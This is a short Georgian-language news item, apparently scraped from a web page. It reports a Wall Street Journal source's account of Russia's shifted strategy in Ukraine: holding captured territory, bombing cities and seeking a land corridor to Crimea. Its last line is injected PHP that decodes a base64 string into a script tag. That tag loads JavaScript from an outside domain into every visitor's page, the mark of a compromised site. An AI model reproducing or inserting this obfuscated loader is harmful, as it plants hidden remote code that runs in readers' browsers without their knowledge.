celsiusi
ავერსი შნაიდერი
ამერიკული გამოცემა Wall Street Journal-ის წყაროს თანახმად, რომელიც ამერიკელი მაღალჩინოსანია, იუწყება , რომ  რუსეთი შეეცდება, ახალი სტრატეგიის თანახმად, მოპოვებული ტერიტორიული ობიექტები დაიცვას და ზეწოლა გაზარდოს უკრაინის ხელისუფლებაზე, მათ შორის, ქალაქების დაბომბვით, რათა საკუთარი ინტერესების დაკმაყოფილება შეძლოს.
 
წყაროს ინფორმაციით, მას შემდეგ, რაც რუსეთმა უკრაინაში სწრაფი გამარჯვების მოპოვება ვერ შეძლო, სტრატეგია შეცვალა და გეგმა „B-ზე“ გადავიდა.
 
გამოცემა იუწყება, რომ პუტინს სურს, უკრაინამ აღიაროს მოსკოვის პრეტენზიები ქვეყნის სამხრეთ და აღმოსავლეთ ტერიტორიებზე, რაც მას საშუალებას მისცემს, შექმნას სახმელეთო კორიდორი, რათა დაუკავშირდეს ოკუპირებულ ყირიმს. ხოლო იმ შემთხვევაში, თუ პუტინის მოთხოვნები არ დაკმაყოფილდება, რუსეთი შეეცდება შეინარჩუნოს ყველა დაკავებული ტერიტორია და კვლავ გაამწვავოს კონფლიქტი.
 
წყაროც ცნობით, თავდაპირველად განიხილებოდა, რომ რუსეთის ინტერესი იყო უკრაინის ხელისუფლების შეცვლა და სატელიტური მთავრობის შექმნა.
 
1200
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");